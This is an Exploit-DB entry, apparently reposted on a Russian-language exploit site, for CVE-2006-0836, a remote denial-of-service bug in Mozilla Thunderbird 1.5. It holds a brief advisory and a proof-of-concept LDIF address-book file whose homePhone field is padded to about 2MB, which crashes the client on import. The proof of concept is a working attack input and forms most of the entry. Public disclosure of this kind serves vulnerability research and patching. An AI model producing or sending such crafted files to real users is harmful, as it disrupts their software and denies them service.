- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 27246
- Проверка EDB
-
- Пройдено
- Автор
- DRFRANCKY
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2006-0836
- Дата публикации
- 2006-02-17
Код:
source: https://www.securityfocus.com/bid/16716/info
Mozilla Thunderbird is prone to a remote denial-of-service vulnerability.
The issue presents itself when the application handles a specially crafted address book file.
Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.
POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by [email protected],[email protected]
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by [email protected]
cn: POC by [email protected]
mozillaNickname: DrFrancky
mail: [email protected]
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']- Источник
- www.exploit-db.com
